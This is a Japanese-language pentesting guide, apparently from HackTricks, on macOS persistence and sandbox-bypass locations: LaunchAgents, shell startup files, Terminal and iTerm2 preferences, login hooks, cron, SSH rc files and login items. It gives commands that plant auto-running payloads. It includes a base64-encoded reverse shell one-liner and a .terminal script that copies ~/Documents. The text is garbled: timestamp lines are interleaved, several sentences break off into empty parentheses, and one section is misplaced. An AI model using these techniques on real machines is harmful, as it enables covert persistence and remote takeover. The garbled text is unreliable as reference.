2023-09-28 20:26:51 +00:00
# macOSの自動起動
2023-06-01 21:09:46 +00:00
< details >
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2023-09-28 21:24:31 +00:00
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
2023-07-07 23:42:27 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASS& ](https://peass.creator-spring.com )を手に入れましょう。
2023-10-01 18:13:43 +00:00
* [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**をフォロー**してください。
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **と** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ) **に提出**してください。
2023-06-01 21:09:46 +00:00
< / details >
2023-09-28 20:26:51 +00:00
このセクションは、ブログシリーズ[**Beyond the good ol' LaunchAgents**](https://theevilbit.github.io/beyond/)を基にしており、**追加の自動起動場所**( ) (
## サンドボックス回避
{% hint style="success" %}
2023-09-28 21:24:31 +00:00
ここでは、**サンドボックス回避**に役立つ起動場所を見つけることができます。これにより、単純に**ファイルに書き込んで待機**し、非常に**一般的なアクション**、決まった**時間**、または通常はルート権限を必要としない**アクション**を実行できます。
2023-09-28 20:26:51 +00:00
{% endhint %}
2023-06-01 21:09:46 +00:00
### Launchd
2023-09-28 20:26:51 +00:00
* サンドボックス回避に役立つ: [✅ ](https://emojipedia.org/check-mark-button )
2023-09-28 20:14:46 +00:00
#### 場所
2023-06-01 21:09:46 +00:00
2023-09-28 20:14:46 +00:00
* **`/Library/LaunchAgents`**
2023-09-28 20:26:51 +00:00
* トリガー: 再起動
2023-09-28 20:14:46 +00:00
* ルート権限が必要です
* **`/Library/LaunchDaemons`**
2023-09-28 20:26:51 +00:00
* トリガー: 再起動
2023-09-28 20:14:46 +00:00
* ルート権限が必要です
* **`/System/Library/LaunchAgents`**
2023-09-28 20:26:51 +00:00
* トリガー: 再起動
2023-09-28 20:14:46 +00:00
* ルート権限が必要です
* **`/System/Library/LaunchDaemons`**
2023-09-28 20:26:51 +00:00
* トリガー: 再起動
2023-09-28 20:14:46 +00:00
* ルート権限が必要です
* **`~/Library/LaunchAgents`**
2023-09-28 20:26:51 +00:00
* トリガー: 再ログイン
2023-09-28 20:14:46 +00:00
* **`~/Library/LaunchDemons`**
2023-09-28 20:26:51 +00:00
* トリガー: 再ログイン
2023-06-01 21:09:46 +00:00
2023-09-28 20:26:51 +00:00
#### 説明と攻撃手法
2023-06-01 21:09:46 +00:00
2023-09-28 21:24:31 +00:00
**`launchd`**は、OX Sカーネルによって起動時に実行される**最初のプロセス**であり、シャットダウン時に終了する最後のプロセスです。常に**PID 1**を持つべきです。このプロセスは、以下の場所にある**ASEP** **plists**で指定された設定を**読み取り、実行**します。
2023-09-28 20:14:46 +00:00
* `/Library/LaunchAgents` : 管理者によってインストールされたユーザーごとのエージェント
* `/Library/LaunchDaemons` : 管理者によってインストールされたシステム全体のデーモン
* `/System/Library/LaunchAgents` : Appleが提供するユーザーごとのエージェント。
* `/System/Library/LaunchDaemons` : Appleが提供するシステム全体のデーモン。
2023-09-28 20:26:51 +00:00
ユーザーがログインすると、`/Users/$USER/Library/LaunchAgents`と`/Users/$USER/Library/LaunchDemons`にあるplistsが**ログインしたユーザーの権限**で開始されます。
2023-09-28 20:14:46 +00:00
**エージェントとデーモンの主な違いは、エージェントはユーザーがログインすると読み込まれ、デーモンはシステムの起動時に読み込まれる**ことです( )
2023-06-01 21:09:46 +00:00
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN">
< plist version = "1.0" >
< dict >
2023-07-07 23:42:27 +00:00
< key > Label< / key >
< string > com.apple.someidentifier< / string >
< key > ProgramArguments< / key >
< array >
2023-09-28 20:14:46 +00:00
< string > bash -c 'touch /tmp/launched'< / string > <!-- Prog to execute -->
2023-07-07 23:42:27 +00:00
< / array >
< key > RunAtLoad< / key > < true / > <!-- Execute at system startup -->
< key > StartInterval< / key >
< integer > 800< / integer > <!-- Execute each 800s -->
< key > KeepAlive< / key >
< dict >
< key > SuccessfulExit< / key > < / false > <!-- Re - execute if exit unsuccessful -->
<!-- If previous is true, then re - execute in successful exit -->
< / dict >
2023-06-01 21:09:46 +00:00
< / dict >
< / plist >
```
2023-07-07 23:42:27 +00:00
ユーザーがログインする前に**エージェントを実行する必要がある**場合があります。これらは**PreLoginAgents**と呼ばれます。たとえば、これはログイン時に支援技術を提供するために役立ちます。これらは`/Library/LaunchAgents`にも見つけることができます([**こちら**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents)に例があります)。
2023-06-01 21:09:46 +00:00
2023-09-28 20:14:46 +00:00
{% hint style="info" %}
新しいデーモンまたはエージェントの設定ファイルは、**次回の再起動後または** `launchctl load <target.plist>` を使用して**ロードされます**。また、拡張子なしの.plistファイルを`launchctl -F < file > `でロードすることも可能です( )
2023-07-07 23:42:27 +00:00
`launchctl unload <target.plist>` を使用して**アンロード**することも可能です(それによって指定されたプロセスは終了します)。
2023-06-01 21:09:46 +00:00
2023-10-01 18:13:43 +00:00
エージェントまたはデーモンが**実行されるのを妨げる**(オーバーライドなど)**何もないことを確認する**には、次のコマンドを実行します:`sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist`
2023-09-28 20:14:46 +00:00
{% endhint %}
2023-06-01 21:09:46 +00:00
2023-10-01 18:13:43 +00:00
現在のユーザーによってロードされているすべてのエージェントとデーモンをリストアップします:
2023-06-01 21:09:46 +00:00
```bash
launchctl list
```
2023-09-28 20:14:46 +00:00
### シェルの起動ファイル
解説: [https://theevilbit.github.io/beyond/beyond\_0001/ ](https://theevilbit.github.io/beyond/beyond\_0001/ )\
解説 (xterm): [https://theevilbit.github.io/beyond/beyond\_0018/ ](https://theevilbit.github.io/beyond/beyond\_0018/ )
2023-09-28 20:26:51 +00:00
* サンドボックス回避に役立つ: [✅ ](https://emojipedia.org/check-mark-button )
2023-09-28 20:14:46 +00:00
#### 場所
* **`~/.zshrc`, `~/.zlogin` , `~/.zshenv` , `~/.zprofile` **
* **トリガー**: zshでターミナルを開く
* **`/etc/zshenv`, `/etc/zprofile` , `/etc/zshrc` , `/etc/zlogin` **
* **トリガー**: zshでターミナルを開く
* ルート権限が必要
* **`~/.zlogout`**
* **トリガー**: zshでターミナルを終了する
* **`/etc/zlogout`**
* **トリガー**: zshでターミナルを終了する
* ルート権限が必要
* 他にもあるかもしれない: ** `man zsh` **
* **`~/.bashrc`**
* **トリガー**: bashでターミナルを開く
* `/etc/profile` (動作しなかった)
* `~/.profile` (動作しなかった)
* `~/.xinitrc` , `~/.xserverrc` , `/opt/X11/etc/X11/xinit/xinitrc.d/`
* **トリガー**: xtermで起動することが期待されていますが、**インストールされていない**ため、インストールしてもこのエラーが表示されます: xterm: `DISPLAY is not set`
2023-09-28 20:26:51 +00:00
#### 説明と攻撃手法
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
シェルの起動ファイルは、`zsh`や`bash`などのシェル環境が**起動する**ときに実行されます。macOSでは最近はデフォルトで`/bin/zsh`が使用され、**`Terminal`を開いたり、デバイスにSSH接続**したときには、このシェル環境が使用されます。`bash`や`sh`も利用可能ですが、明示的に起動する必要があります。
2023-09-28 20:14:46 +00:00
`man zsh` で読むことができるzshのマニュアルページには、起動ファイルの詳しい説明があります。
```bash
# Example executino via ~/.zshrc
echo "touch /tmp/hacktricks" >> ~/.zshrc
```
2023-09-28 20:26:51 +00:00
### 再オープンされるアプリケーション
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
{% hint style="danger" %}
2023-10-01 18:13:43 +00:00
指定された攻撃手法の設定やログアウト、ログイン、または再起動を行っても、アプリケーションを実行することができませんでした。(アプリケーションが実行されていなかったのかもしれません。これらの操作を実行する際には、アプリケーションが実行されている必要があるかもしれません。)
2023-09-28 20:26:51 +00:00
{% endhint %}
**解説**: [https://theevilbit.github.io/beyond/beyond\_0021/ ](https://theevilbit.github.io/beyond/beyond\_0021/ )
* サンドボックスをバイパスするのに役立ちます: [✅ ](https://emojipedia.org/check-mark-button )
2023-09-28 20:14:46 +00:00
#### 場所
2023-09-28 20:26:51 +00:00
* **`~/Library/Preferences/ByHost/com.apple.loginwindow.< UUID > .plist`**
* **トリガー**: アプリケーションの再起動
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
#### 説明と攻撃手法
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
再オープンされるすべてのアプリケーションは、plist `~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist` 内にあります。
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
したがって、自分自身のアプリケーションを再オープンアプリケーションとして起動するには、単に**アプリケーションをリストに追加**するだけです。
2023-09-28 20:26:51 +00:00
UUIDは、そのディレクトリをリストアップするか、`ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'` を使用して見つけることができます。
再オープンされるアプリケーションを確認するには、次のコマンドを実行します:
```bash
defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin
#or
plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow.< UUID > .plist
2023-09-28 20:14:46 +00:00
```
2023-09-28 20:26:51 +00:00
このリストにアプリケーションを追加するには、次の方法を使用できます:
2023-09-28 20:14:46 +00:00
```bash
2023-09-28 20:26:51 +00:00
# Adding iTerm2
/usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \
-c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \
-c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \
-c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \
-c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \
~/Library/Preferences/ByHost/com.apple.loginwindow.< UUID > .plist
2023-09-28 20:14:46 +00:00
```
2023-10-01 18:13:43 +00:00
### ターミナルの設定
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
* サンドボックスをバイパスするのに便利: [✅ ](https://emojipedia.org/check-mark-button )
#### 場所
* **`~/Library/Preferences/com.apple.Terminal.plist`**
* **トリガー**: ターミナルを開く
#### 説明と攻撃手法
**`~/Library/Preferences`** には、アプリケーションのユーザーの設定が保存されています。これらの設定の中には、**他のアプリケーションやスクリプトを実行する**ための構成が含まれているものもあります。
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
例えば、ターミナルは起動時にコマンドを実行することができます:
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
< figure > < img src = "../.gitbook/assets/image (676).png" alt = "" width = "495" > < figcaption > < / figcaption > < / figure >
2023-10-01 18:13:43 +00:00
この設定は、ファイル ** `~/Library/Preferences/com.apple.Terminal.plist` ** に以下のように反映されます:
2023-09-28 20:14:46 +00:00
```bash
[...]
2023-09-28 20:26:51 +00:00
"Window Settings" => {
"Basic" => {
"CommandString" => "touch /tmp/terminal_pwn"
"Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf }
"FontAntialias" => 1
"FontWidthSpacing" => 1.004032258064516
"name" => "Basic"
"ProfileCurrentVersion" => 2.07
"RunCommandAsShell" => 0
"type" => "Window Settings"
}
2023-09-28 20:14:46 +00:00
[...]
```
2023-09-28 20:26:51 +00:00
したがって、システムのターミナルの設定のplistが上書きされると、**`open`**機能を使用して**ターミナルを開き、そのコマンドが実行されます**。
次のコマンドを使用して、cliからこれを追加できます:
2023-09-28 20:14:46 +00:00
{% code overflow="wrap" %}
```bash
# Add
2023-09-28 20:26:51 +00:00
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" 'touch /tmp/terminal-start-command'" $HOME/Library/Preferences/com.apple.Terminal.plist
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"RunCommandAsShell\" 0" $HOME/Library/Preferences/com.apple.Terminal.plist
2023-09-28 20:14:46 +00:00
# Remove
2023-09-28 20:26:51 +00:00
/usr/libexec/PlistBuddy -c "Set :\"Window Settings\":\"Basic\":\"CommandString\" ''" $HOME/Library/Preferences/com.apple.Terminal.plist
2023-09-28 20:14:46 +00:00
```
{% endcode %}
2023-10-01 18:13:43 +00:00
### ターミナルスクリプト
* サンドボックスをバイパスするのに便利: [✅ ](https://emojipedia.org/check-mark-button )
#### 場所
* **どこでも**
* **トリガー**: ターミナルを開く
#### 説明と攻撃手法
[**`.terminal`** スクリプト ](https://stackoverflow.com/questions/32086004/how-to-use-the-default-terminal-settings-when-opening-a-terminal-file-osx )を作成して開くと、**ターミナルアプリケーション**が自動的に起動し、そこに指定されたコマンドが実行されます。ターミナルアプリに特別な権限( )
以下を試してみてください:
```bash
# Prepare the payload
cat > /tmp/test.terminal < < EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
< key > CommandString< / key >
< string > mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents;< / string >
< key > ProfileCurrentVersion< / key >
< real > 2.0600000000000001< / real >
< key > RunCommandAsShell< / key >
< false / >
< key > name< / key >
< string > exploit< / string >
< key > type< / key >
< string > Window Settings< / string >
< / dict >
< / plist >
EOF
# Trigger it
open /tmp/test.terminal
# Use something like the following for a reverse shell:
< string > echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash;< / string >
```
{% hint style="danger" %}
ターミナルに**フルディスクアクセス**がある場合、そのアクションを完了することができます(実行されたコマンドはターミナルウィンドウに表示されます)。
{% endhint %}
2023-09-28 20:26:51 +00:00
### オーディオプラグイン
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
解説: [https://theevilbit.github.io/beyond/beyond\_0013/ ](https://theevilbit.github.io/beyond/beyond\_0013/ )\
解説: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882 ](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882 )
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
#### 位置
2023-09-28 20:26:51 +00:00
* **`/Library/Audio/Plug-Ins/HAL`**
2023-10-01 18:13:43 +00:00
* ルートアクセスが必要
2023-09-28 20:26:51 +00:00
* **トリガー**: coreaudiodまたはコンピュータの再起動
* **`/Library/Audio/Plug-ins/Components`**
2023-10-01 18:13:43 +00:00
* ルートアクセスが必要
2023-09-28 20:26:51 +00:00
* **トリガー**: coreaudiodまたはコンピュータの再起動
* **`~/Library/Audio/Plug-ins/Components`**
* **トリガー**: coreaudiodまたはコンピュータの再起動
* **`/System/Library/Components`**
2023-10-01 18:13:43 +00:00
* ルートアクセスが必要
2023-09-28 20:26:51 +00:00
* **トリガー**: coreaudiodまたはコンピュータの再起動
#### 説明
2023-10-01 18:13:43 +00:00
以前の解説によると、いくつかのオーディオプラグインを**コンパイル**してロードすることが可能です。
2023-09-28 20:26:51 +00:00
### QuickLookプラグイン
解説: [https://theevilbit.github.io/beyond/beyond\_0028/ ](https://theevilbit.github.io/beyond/beyond\_0028/ )
* サンドボックスをバイパスするのに便利: [✅ ](https://emojipedia.org/check-mark-button )
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
#### 位置
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
* `/System/Library/QuickLook`
* `/Library/QuickLook`
* `~/Library/QuickLook`
* `/Applications/AppNameHere/Contents/Library/QuickLook/`
* `~/Applications/AppNameHere/Contents/Library/QuickLook/`
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
#### 説明と攻撃手法
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
QuickLookプラグインは、ファイルのプレビューを**トリガー**( )
2023-09-28 20:14:46 +00:00
2023-09-28 23:15:43 +00:00
独自のQuickLookプラグインをコンパイルし、前述のいずれかの場所に配置してロードし、サポートされているファイルに移動してスペースを押すことでトリガーすることが可能です。
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
### ~~ログイン/ログアウトフック~~
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
{% hint style="danger" %}
2023-10-01 18:13:43 +00:00
私にはうまくいきませんでした。ユーザーログインフックもルートログアウトフックもうまく動作しませんでした。
2023-09-28 20:26:51 +00:00
{% endhint %}
**解説**: [https://theevilbit.github.io/beyond/beyond\_0022/ ](https://theevilbit.github.io/beyond/beyond\_0022/ )
サンドボックスをバイパスするのに便利: [✅ ](https://emojipedia.org/check-mark-button )
2023-10-01 18:13:43 +00:00
#### 位置
2023-09-28 20:26:51 +00:00
2023-10-01 18:13:43 +00:00
* `defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh` のようなコマンドを実行できる必要があります
* `~/Library/Preferences/com.apple.loginwindow.plist` にあります
2023-09-28 20:26:51 +00:00
2023-10-01 18:13:43 +00:00
これらは非推奨ですが、ユーザーがログインしたときにコマンドを実行するために使用することができます。
2023-09-28 20:14:46 +00:00
```bash
2023-09-28 20:26:51 +00:00
cat > $HOME/hook.sh < < EOF
#!/bin/bash
echo 'My is: \`id\`' > /tmp/login_id.txt
EOF
chmod +x $HOME/hook.sh
defaults write com.apple.loginwindow LoginHook /Users/$USER/hook.sh
defaults write com.apple.loginwindow LogoutHook /Users/$USER/hook.sh
2023-09-28 20:14:46 +00:00
```
2023-09-28 20:26:51 +00:00
この設定は`/Users/$USER/Library/Preferences/com.apple.loginwindow.plist`に保存されています。
2023-09-28 20:14:46 +00:00
```bash
2023-09-28 20:26:51 +00:00
defaults read /Users/$USER/Library/Preferences/com.apple.loginwindow.plist
{
LoginHook = "/Users/username/hook.sh";
LogoutHook = "/Users/username/hook.sh";
MiniBuddyLaunch = 0;
TALLogoutReason = "Shut Down";
TALLogoutSavesState = 0;
oneTimeSSMigrationComplete = 1;
}
2023-09-28 20:14:46 +00:00
```
2023-09-28 20:26:51 +00:00
削除するには:
```bash
defaults delete com.apple.loginwindow LoginHook
defaults delete com.apple.loginwindow LogoutHook
```
ルートユーザーのスタート位置は**`/private/var/root/Library/Preferences/com.apple.loginwindow.plist`**に保存されています。
2023-09-28 21:24:31 +00:00
## 条件付きサンドボックスバイパス
2023-09-28 20:26:51 +00:00
{% hint style="success" %}
2023-09-28 21:24:31 +00:00
ここでは、**サンドボックスバイパス**に役立つスタート位置を見つけることができます。これにより、単純に**ファイルに書き込んで実行する**ことができます。特定の**インストールされたプログラム、"一般的でない"ユーザー**のアクションや環境など、**一般的でない条件**を期待します。
2023-09-28 20:14:46 +00:00
{% endhint %}
2023-06-01 21:09:46 +00:00
### Cron
2023-09-28 20:14:46 +00:00
**解説**: [https://theevilbit.github.io/beyond/beyond\_0004/ ](https://theevilbit.github.io/beyond/beyond\_0004/ )
2023-09-28 21:24:31 +00:00
* サンドボックスバイパスに役立つ: [✅ ](https://emojipedia.org/check-mark-button )
2023-09-28 20:26:51 +00:00
* ただし、`crontab`バイナリを実行できる必要があります
* または、ルートユーザーである必要があります
2023-09-28 20:14:46 +00:00
#### 位置
* **`/usr/lib/cron/tabs/`, `/private/var/at/tabs` , `/private/var/at/jobs` , `/etc/periodic/` **
2023-10-01 18:13:43 +00:00
* 直接書き込みアクセスにはルートが必要です。`crontab < file > `を実行できる場合はルートは不要です。
2023-09-28 20:14:46 +00:00
* **トリガー**: cronジョブに依存します。
2023-09-28 20:26:51 +00:00
#### 説明と攻撃手法
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
現在のユーザーのcronジョブをリストアップするには、以下を実行します:
2023-06-01 21:09:46 +00:00
```bash
crontab -l
```
2023-09-26 23:45:10 +00:00
ユーザーのすべてのcronジョブは、**`/usr/lib/cron/tabs/`**と**`/var/at/tabs/`**( )
2023-06-01 21:09:46 +00:00
2023-09-28 21:24:31 +00:00
MacOSでは、**特定の頻度**でスクリプトを実行するいくつかのフォルダが次の場所にあります:
2023-06-01 21:09:46 +00:00
```bash
2023-09-28 20:26:51 +00:00
# The one with the cron jobs is /usr/lib/cron/tabs/
2023-06-01 21:09:46 +00:00
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/
```
2023-09-28 20:14:46 +00:00
そこには通常の**cronジョブ**、あまり使われていない**atジョブ**、および一時ファイルのクリーニングに主に使用される**periodicジョブ**があります。例えば、デイリーのperiodicジョブは次のように実行できます: `periodic daily` 。
**ユーザーのcronジョブをプログラムで追加**するには、次のようにすることができます:
```bash
echo '* * * * * /bin/bash -c "touch /tmp/cron3"' > /tmp/cron
crontab /tmp/cron
```
2023-09-28 20:26:51 +00:00
### iTerm2
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
解説: [https://theevilbit.github.io/beyond/beyond\_0002/ ](https://theevilbit.github.io/beyond/beyond\_0002/ )
2023-09-28 20:26:51 +00:00
* サンドボックスをバイパスするのに便利: [✅ ](https://emojipedia.org/check-mark-button )
2023-09-28 20:14:46 +00:00
#### 場所
2023-06-01 21:09:46 +00:00
2023-09-28 20:26:51 +00:00
* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`**
* **トリガー**: iTermを開く
* **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`**
* **トリガー**: iTermを開く
* **`~/Library/Preferences/com.googlecode.iterm2.plist`**
* **トリガー**: iTermを開く
2023-09-28 20:14:46 +00:00
#### 説明と攻撃手法
2023-09-28 20:26:51 +00:00
**`~/Library/Application Support/iTerm2/Scripts/AutoLaunch`**に保存されたスクリプトが実行されます。例えば:
```bash
cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh" < < EOF
#!/bin/bash
touch /tmp/iterm2-autolaunch
EOF
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh"
```
スクリプト ** `~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt` ** も実行されます:
2023-06-01 21:09:46 +00:00
```bash
2023-09-28 20:26:51 +00:00
do shell script "touch /tmp/iterm2-autolaunchscpt"
```
**`~/Library/Preferences/com.googlecode.iterm2.plist`**にあるiTerm2の設定は、iTerm2ターミナルが開かれたときに実行するコマンドを示すことができます。
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
この設定はiTerm2の設定で構成することができます:
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
< figure > < img src = "../.gitbook/assets/image.png" alt = "" width = "563" > < figcaption > < / figcaption > < / figure >
そして、コマンドは設定に反映されます:
```bash
plutil -p com.googlecode.iterm2.plist
{
[...]
"New Bookmarks" => [
0 => {
2023-09-28 20:14:46 +00:00
[...]
2023-09-28 20:26:51 +00:00
"Initial Text" => "touch /tmp/iterm-start-command"
```
コマンドを実行するには、次のように設定できます:
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
{% code overflow="wrap" %}
```bash
# Add
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" 'touch /tmp/iterm-start-command'" $HOME/Library/Preferences/com.googlecode.iterm2.plist
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
# Call iTerm
open /Applications/iTerm.app/Contents/MacOS/iTerm2
# Remove
/usr/libexec/PlistBuddy -c "Set :\"New Bookmarks\":0:\"Initial Text\" ''" $HOME/Library/Preferences/com.googlecode.iterm2.plist
2023-09-28 20:14:46 +00:00
```
{% endcode %}
2023-09-28 20:26:51 +00:00
{% hint style="warning" %}
iTerm2の設定を悪用する他の方法がある可能性が非常に高いです。
{% endhint %}
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
### xbar
解説: [https://theevilbit.github.io/beyond/beyond\_0007/ ](https://theevilbit.github.io/beyond/beyond\_0007/ )
* サンドボックスをバイパスするのに便利: [✅ ](https://emojipedia.org/check-mark-button )
* ただし、xbarをインストールする必要があります
2023-09-28 20:14:46 +00:00
#### 場所
2023-09-28 20:26:51 +00:00
* **`~/Library/Application\ Support/xbar/plugins/`**
* **トリガー**: xbarが実行されるとき
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
### Hammerspoon
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
**解説**: [https://theevilbit.github.io/beyond/beyond\_0008/ ](https://theevilbit.github.io/beyond/beyond\_0008/ )
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
サンドボックスをバイパスするのに便利: [✅ ](https://emojipedia.org/check-mark-button )
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
* ただし、Hammerspoonをインストールする必要があります
2023-09-28 20:14:46 +00:00
#### 場所
2023-09-28 20:26:51 +00:00
* **`~/.hammerspoon/init.lua`**
* **トリガー**: Hammerspoonが実行されるとき
2023-09-28 20:14:46 +00:00
#### 説明
2023-09-28 20:26:51 +00:00
[**Hammerspoon** ](https://github.com/Hammerspoon/hammerspoon )は、**LUAスクリプト言語を通じてmacOSのスクリプト化を可能にする自動化ツール**です。AppleScriptのコードを埋め込むこともでき、シェルスクリプトを実行することもできます。
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
このアプリは、単一のファイル`~/.hammerspoon/init.lua`を探し、起動時にスクリプトが実行されます。
2023-09-28 20:26:51 +00:00
```bash
cat > "$HOME/.hammerspoon/init.lua" < < EOF
hs.execute("id > /tmp/hs.txt")
EOF
```
### SSHRC
2023-09-28 20:14:46 +00:00
2023-09-28 23:15:43 +00:00
解説: [https://theevilbit.github.io/beyond/beyond\_0006/ ](https://theevilbit.github.io/beyond/beyond\_0006/ )
2023-09-28 20:26:51 +00:00
* サンドボックスをバイパスするのに便利: [✅ ](https://emojipedia.org/check-mark-button )
2023-10-01 18:13:43 +00:00
* ただし、sshが有効化されて使用される必要があります
2023-09-28 20:14:46 +00:00
#### 場所
2023-09-28 20:26:51 +00:00
* **`~/.ssh/rc`**
* **トリガー**: SSH経由でログイン
* **`/etc/ssh/sshrc`**
* ルート権限が必要
* **トリガー**: SSH経由でログイン
#### 説明と攻撃手法
2023-09-28 23:15:43 +00:00
デフォルトでは、`/etc/ssh/sshd_config`の`PermitUserRC no`が設定されていない限り、ユーザーが**SSH経由でログイン**すると、スクリプト**`/etc/ssh/sshrc`**と**`~/.ssh/rc`**が実行されます。
2023-09-28 20:14:46 +00:00
#### 説明
2023-09-28 20:26:51 +00:00
人気のあるプログラム[**xbar**](https://github.com/matryer/xbar)がインストールされている場合、**`~/Library/Application\ Support/xbar/plugins/`**にシェルスクリプトを書くことができます。このスクリプトはxbarが起動された時に実行されます。
2023-09-28 20:14:46 +00:00
```bash
cat > "$HOME/Library/Application Support/xbar/plugins/a.sh" < < EOF
#!/bin/bash
touch /tmp/xbar
EOF
chmod +x "$HOME/Library/Application Support/xbar/plugins/a.sh"
```
2023-09-28 20:26:51 +00:00
### **ログインアイテム**
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
解説: [https://theevilbit.github.io/beyond/beyond\_0003/ ](https://theevilbit.github.io/beyond/beyond\_0003/ )
* サンドボックスをバイパスするのに便利: [✅ ](https://emojipedia.org/check-mark-button )
* ただし、`osascript`を引数として実行する必要があります
2023-09-28 20:14:46 +00:00
#### 場所
2023-09-28 20:26:51 +00:00
* **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`**
* **トリガー:** ログイン
* 悪意のあるペイロードは、**`osascript`** を呼び出して保存されます
* **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`**
* **トリガー:** ログイン
* ルート権限が必要です
2023-09-28 20:14:46 +00:00
#### 説明
2023-09-28 20:26:51 +00:00
システム環境設定 -> ユーザーとグループ -> **ログインアイテム** には、**ユーザーがログインしたときに実行されるアイテム** があります。\
これらをコマンドラインからリストアップ、追加、削除することが可能です。
2023-09-28 20:14:46 +00:00
```bash
2023-09-28 20:26:51 +00:00
#List all items:
osascript -e 'tell application "System Events" to get the name of every login item'
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
#Add an item:
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}'
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
#Remove an item:
osascript -e 'tell application "System Events" to delete login item "itemname"'
```
